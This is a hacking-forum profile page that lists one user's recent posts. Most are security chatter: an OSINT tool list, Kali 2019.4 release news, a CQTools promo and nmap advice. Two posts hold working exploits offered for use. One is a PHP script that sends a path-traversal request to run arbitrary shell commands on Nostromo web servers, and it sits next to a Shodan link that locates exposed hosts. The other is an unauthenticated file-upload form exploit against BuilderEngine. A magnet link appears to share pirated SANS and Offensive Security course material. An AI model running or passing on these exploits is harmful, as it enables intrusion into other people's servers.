BiosHell

Active Members
  • Content Count

    400
  • Days Won

    21

BiosHell last won the day on November 25

BiosHell had the most liked content!

Community Reputation

282 Excellent

11 Followers

About BiosHell

  • Rank
    Active Member

Recent Profile Visitors

3401 profile views
  1. Is Security+ worth it?? Definitely NOT, go for other certifications that are more relevant.
  2. Recon and Intel Gathering Tools

    1. OSINT Framework
    2. CheckUserNames
    3. HaveIbeenPwned
    4. BeenVerified
    5. Censys
    6. BuiltWith
    7. Google Dorks
    8. Maltego
    9. Recon-Ng
    10. theHarvester
    11. Shodan
    12. Jigsaw
    13. SpiderFoot
    14. Creepy
    15. Nmap
    16. WebShag
    17. OpenVAS
    18. Fierce
    19. Unicornscan
    20. Foca

    Reference Link : https://securitytrails.com/blog/top-20-intel-tools
  3. Kali Linux 2019.4 includes new undercover mode for pentesters doing work in public places

    Offensive Security, maintainers of the popular Kali Linux open source project, released Kali Linux 2019.4, the latest iteration of the Kali Linux penetration testing platform. The new release includes several new features, including a new default desktop environment, a new theme and a new undercover mode for pentesters doing assessment work in public places.

    Move from Gnome to Xfce

    The most noteworthy aspect of the 2019.4 release is Kali’s move from the Gnome environment to Xfce to address some known issues. Specific improvements as a result of the new environment include:

      • Improved performance – The Gnome environment is a fully-featured desktop environment with many capabilities. However, all the capabilities come with overhead that is often not useful for a distribution like Kali. Moving to the more lightweight Xfce environment addresses these issues, providing an environment more in line with the typical Kali user’s needs.
      • Unified UI – Because Kali can be run on everything from bare metal to high end laptops, the lower-end ARM builds often had a different UI than other deployments. OffSec now offers a standardized UI for all Kali distributions.

    Kali Undercover

    Let’s say you are working in a public place and you might not want the distinctive Kali dragon for everyone to see and wonder what it is you are doing. The developers made a little script that will change your Kali theme to look like a default Windows installation. That way, you can work a bit more incognito. After you are done and in a more private place, run the script again and you switch back to your Kali theme.

    Other Kali Linux 2019.4 updates

      • Kali Documentation has a new home and is now Git powered
      • Public Packaging – getting your tools into Kali
      • Kali NetHunter KeX – Full Kali desktop on Android
      • BTRFS during setup
      • Added PowerShell
      • The kernel is upgraded to version 5.3.9
      • Plus the normal bug fixes and updates.
  4. BiosHell

    Nostromo RCE

    I'm just gonna leave this here : https://www.shodan.io/search?query=nostromo
  5. <!--
    # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
    # Date: 18/09/2016
    # Exploit Author: metanubix
    # Vendor Homepage: http://builderengine.org/
    # Software Link: http://builderengine.org/page-cms-download.html
    # Version: 3.5.0
    # Tested on: Kali Linux 2.0 64 bit
    # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

    1) Unauthenticated Unrestricted File Upload:

        POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
        Vulnerable Parameter: files[]

        We can upload test.php and reach the file via the following link:
        /files/test.php
    -->
    <html>
    <body>
    <form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
        <input type="file" name="files[]" />
        <input type="submit" value="send" />
    </form>
    </body>
    </html>

    Reference Link : https://www.exploit-db.com/exploits/40390
  6. BiosHell

    Nostromo RCE

    <?php
    $hos = $argv[1];
    $cmd = $argv[2];
    $po = explode(":", $hos);
    $fp = fsockopen($po[0], $po[1]);
    fwrite($fp, "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n");
    fwrite($fp, "Content-Length: 1\r\n\r\necho\necho\n{$cmd} 2>&1");
    while (!feof($fp)) {
        echo fgets($fp, 1024);
    }
    ?>

    usage : php nostromo.php ip:port "commands"
  7. CQURE Team has prepared tools used during penetration testing and packed those in a toolkit named CQTools. This toolkit allows to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team. CQURE was the first team that did full reverse engineering of DPAPI (Data Protection Application Programming Interface) and prepared the first public tool that allows monitoring WSL (Windows Subsystem for Linux) feature.

    This toolkit allows you to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team; some of the tools took years to complete, and all of the tools work in a straightforward manner.

    CQTools is the ultimate toolkit to have when delivering a penetration test. The tools work simply, and we use them in practice during our cybersecurity assignments. Come and have a look at how our CQTools can boost your penetration testing experience!

    Reference Link : https://www.kitploit.com/2019/05/cqtools-new-ultimate-windows-hacking.html
  8. 1. How are you using nmap? Did you RTFM? There are many ways to scan for open ports... why do you rely on just one tool?
    2. I'd tell you to watch out for the firewall, but you don't have one in HTB... be careful how you scan, what you scan for and in what way.
    3. I can't believe that nmap does NOT work properly just like that, for no reason at all.
    4. There is no such thing as it not showing you the correct ports, except in the case of a UDP scan, say, where you see all ports as open (there, yes, false positives).
  9. magnet:?xt=urn:btih:f91feb6d2ea93f1c3c03b6be52051c2df72da1b7&dn=CERTCOLLECTION+-+BASELINE+-+SANS+%26+Offensive-Security&tr=udp%3A//tracker.coppersurfer.tk%3A6969&tr=udp%3A//tracker.zer0day.to%3A1337&tr=udp%3A//public.popcorn-tracker.org%3A6969&tr=udp%3A//tracker.leechers-paradise.org%3A6969&tr=udp%3A//explodie.org%3A6969